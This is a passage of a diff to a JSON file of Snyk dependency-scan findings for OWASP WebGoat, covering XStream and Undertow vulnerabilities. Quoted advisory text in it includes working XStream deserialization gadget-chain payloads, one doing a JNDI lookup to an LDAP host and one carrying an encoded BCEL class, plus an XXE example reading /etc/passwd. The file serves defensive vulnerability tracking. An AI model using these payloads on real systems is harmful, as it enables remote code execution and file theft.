class='javax.naming.directory.BasicAttributes' serialization='custom'\u003e\r\n                        \u003cdefault\u003e\r\n                          \u003cignoreCase\u003efalse\u003c/ignoreCase\u003e\r\n                        \u003c/default\u003e\r\n        ",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.jboss.xnio:xnio-api",
-                  "version": "3.8.8.Final"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000044-0000-4000-8000-000000000044",
+          "key": "00000000-0000-0000-0000-000000000020",
           "locations": [
             {
               "package": {
-                "name": "org.jboss.xnio:xnio-api",
-                "version": "3.8.8.Final"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 101
-            }
-          },
-          "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
+          "problems": [
+            { "id": "CWE-434", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:14:45.151211Z",
+              "credits": ["wh1t3p1g"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:22.162024Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.81219Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:54.978741Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:58.747506Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:13:11Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.67811",
+                "probability": "0.00573"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:54.978741Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:24.762736Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39147.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2021-39147", "source": "cve" },
+            { "id": "GHSA-h7v4-7xg3-hxcc", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "00000044-0000-4000-8000-000000000044",
+        "id": "00000000-0000-0000-0000-000000000020",
         "links": {},
         "relationships": {
           "fix": {
@@ -15181,25 +3398,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.jboss.xnio:xnio-api",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.2.10"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.17.Final"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.jboss.xnio:xnio-api",
-                          "version": "3.8.16.Final"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -15208,7 +3417,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000044-0000-4000-8000-000000000044",
+              "id": "00000000-0000-0000-0000-000000000020",
               "type": "fixes"
             }
           }
@@ -15218,13 +3427,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003etest\u003c/type\u003e\r\n    \u003cvalue class='javax.swing.MultiUIDefaults' serialization='custom'\u003e\r\n      \u003cunserializable-parents/\u003e\r\n      \u003chashtable\u003e\r\n          \u003cdefault\u003e\r\n            \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n            \u003cthreshold\u003e525\u003c/threshold\u003e\r\n          \u003c/default\u003e\r\n          \u003cint\u003e700\u003c/int\u003e\r\n          \u003cint\u003e0\u003c/int\u003e\r\n      \u003c/hashtable\u003e\r\n      \u003cjavax.swing.UIDefaults\u003e\r\n          \u003cdefault\u003e\r\n            \u003cdefaultLocale\u003ezh_CN\u003c/defaultLocale\u003e\r\n            \u003cresourceCache/\u003e\r\n          \u003c/default\u003e\r\n      \u003c/javax.swing.UIDefaults\u003e\r\n      \u003cjavax.swing.MultiUIDefaults\u003e\r\n          \u003cdefault\u003e\r\n            \u003ctables\u003e\r\n            \u003cjavax.swing.UIDefaults serialization='custom'\u003e\r\n              \u003cunserializable-parents/\u003e\r\n              \u003chashtable\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n                  \u003cthreshold\u003e525\u003c/threshold\u003e\r\n                \u003c/default\u003e\r\n                \u003cint\u003e700\u003c/int\u003e\r\n                \u003cint\u003e1\u003c/int\u003e\r\n                \u003cstring\u003elazyValue\u003c/string\u003e\r\n                \u003cjavax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n                  \u003cclassName\u003ejavax.naming.InitialContext\u003c/className\u003e\r\n                  \u003cmethodName\u003edoLookup\u003c/methodName\u003e\r\n                  \u003cargs\u003e\r\n                    \u003cstring\u003eldap://127.0.0.1:1389/#evil\u003c/string\u003e\r\n                  \u003c/args\u003e\r\n                \u003c/javax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n              \u003c/hashtable\u003e\r\n              \u003cjavax.swing.UIDefaults\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cdefaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/\u003e\r\n                  \u003cresourceCache/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/tables\u003e\r\n          \u003c/default\u003e\r\n      \u003c/javax.swing.MultiUIDefaults\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003etest\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39146.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'\u003e\r\n                \u003cnames class='java.util.AbstractList$Itr'\u003e\r\n                  \u003ccursor\u003e0\u003c/cursor\u003e\r\n                  \u003clastRet\u003e-1\u003c/lastRet\u003e\r\n                  \u003cexpectedModCount\u003e0\u003c/expectedModCount\u003e\r\n                  \u003couter-class class='java.util.Arrays$ArrayList'\u003e\r\n                    \u003ca class='string-array'\u003e\r\n                      \u003cstring\u003e$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A\u003c/string\u003e\r\n                    \u003c/a\u003e\r\n                  \u003c/outer-class\u003e\r\n                \u003c/names\u003e\r\n                \u003cprocessorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'\u003e\r\n                  \u003cparent class='sun.misc.Launcher$ExtClassLoader'\u003e\r\n                  \u003c/parent\u003e\r\n                  \u003cpackage2certs class='hashtable'/\u003e\r\n                  \u003cclasses defined-in='java.lang.ClassLoader'/\u003e\r\n                  \u003cdefaultDomain\u003e\r\n                    \u003cclassloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/\u003e\r\n                    \u003cprincipals/\u003e\r\n                    \u003chasAllPerm\u003efalse\u003c/hasAllPerm\u003e\r\n                    \u003cstaticPermissions\u003efalse\u003c/staticPermissions\u003e\r\n                    \u003ckey\u003e\r\n                      \u003couter-class reference='../..'/\u003e\r\n                    \u003c/key\u003e\r\n                  \u003c/defaultDomain\u003e\r\n                  \u003cpackages/\u003e\r\n                  \u003cnativeLibraries/\u003e\r\n                  \u003cassertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/\u003e\r\n                  \u003cdefaultAssertionStatus\u003efalse\u003c/defaultAssertionStatus\u003e\r\n                  \u003cclasses/\u003e\r\n                  \u003cignored__packages\u003e\r\n                    \u003cstring\u003ejava.\u003c/string\u003e\r\n                    \u003cstring\u003ejavax.\u003c/string\u003e\r\n                    \u003cstring\u003esun.\u003c/string\u003e\r\n                  \u003c/ignored__packages\u003e\r\n                  \u003crepository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'\u003e\r\n                    \u003c__path\u003e\r\n                      \u003cpaths/\u003e\r\n                      \u003cclass__path\u003e.\u003c/class__path\u003e\r\n                    \u003c/__path\u003e\r\n                    \u003c__loadedClasses/\u003e\r\n                  \u003c/repository\u003e\r\n                  \u003cdeferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/\u003e\r\n                \u003c/processorCL\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e0\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called des",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -15235,7 +3444,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000045-0000-4000-8000-000000000045",
+          "key": "00000000-0000-0000-0000-000000000021",
           "locations": [
             {
               "package": {
@@ -15246,18 +3455,114 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 455
-            }
-          },
-          "title": "Arbitrary Code Execution"
+          "problems": [
+            { "id": "GHSA-43gc-mjxg-gvrq", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T13:05:10.38087Z",
+              "credits": ["threedr3am"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:45.866493Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:14.631578Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.939054Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:11.186635Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T13:03:44Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.91816",
+                "probability": "0.08244"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:48.939054Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:22.887658Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21350.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "CVE-2021-21350", "source": "cve" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 157 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000045-0000-4000-8000-000000000045",
+        "id": "00000000-0000-0000-0000-000000000021",
         "links": {},
         "relationships": {
           "fix": {
@@ -15271,11 +3576,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -15284,7 +3589,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000045-0000-4000-8000-000000000045",
+              "id": "00000000-0000-0000-0000-000000000021",
               "type": "fixes"
             }
           }
@@ -15294,105 +3599,141 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "Dual license: EPL-1.0, LGPL-2.1",
+          "description": "## Overview\r\n[`com.thoughtworks.xstream:xstream`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xstream%22) is a simple library to serialize objects to XML and back again.\r\nMultiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document.\r\n\r\n## Details\r\n\r\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\r\n   \u003cusername\u003eJohn\u003c/username\u003e\r\n\u003c/xml\u003e\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of  `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\r\n\u003c!DOCTYPE foo [\r\n   \u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\" \u003e]\u003e\r\n   \u003cusername\u003e\u0026xxe;\u003c/username\u003e\r\n\u003c/xml\u003e\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674)\r\n- [OSS Security](http://www.openwall.com/lists/oss-security/2016/03/28/1)\r\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/25)",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000046-0000-4000-8000-000000000046",
+          "key": "00000000-0000-0000-0000-000000000022",
           "locations": [
             {
               "package": {
-                "name": "ch.qos.logback:logback-classic",
-                "version": "1.4.11"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {},
-          "title": "Dual license: EPL-1.0, LGPL-2.1"
-        },
-        "id": "00000046-0000-4000-8000-000000000046",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to insufficient limitations on the amount of `CONTINUATION` frames that can be sent within a single stream. An attacker can use up compute or memory resources to cause a disruption in service by sending packets to vulnerable servers.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [Apache Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)\n- [Github Commit](https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6)\n- [PoC](https://github.com/lockness-Ko/CVE-2024-27316)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2268277)\n- [Security Notes](https://www.kb.cert.org/vuls/id/421644)\n",
-          "evidence": [
-            {
-              "path": [
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[0.3 ,1.4.9)"],
+              "created_at": "2017-02-22T07:28:18.55Z",
+              "credits": ["guykoth"],
+              "cvss_base_score": 7.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:01:33.956931Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-05-24T01:13:45.713672Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.3,
+                  "cvss_version": "3.0",
+                  "modified_at": "2024-03-11T09:50:00.74058Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
+              "disclosed_at": "2016-03-20T22:26:12Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.85710",
+                "probability": "0.02859"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385",
+              "initially_fixed_in_versions": ["1.4.9"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-05-24T01:13:45.713672Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2016-03-20T22:26:12Z",
+              "references": [
                 {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/5b5cd6d8137f645c5d57b648afb1a305967aa7f4"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/696ec886a23dae880cf12e34e1fe09c5df8fe946"
+                },
+                {
+                  "title": "GitHub Issue",
+                  "url": "https://github.com/x-stream/xstream/issues/25"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
+                  "title": "NVD",
+                  "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674"
                 },
                 {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
+                  "title": "OSS security Advisory",
+                  "url": "http://www.openwall.com/lists/oss-security/2016/03/28/1"
                 }
               ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
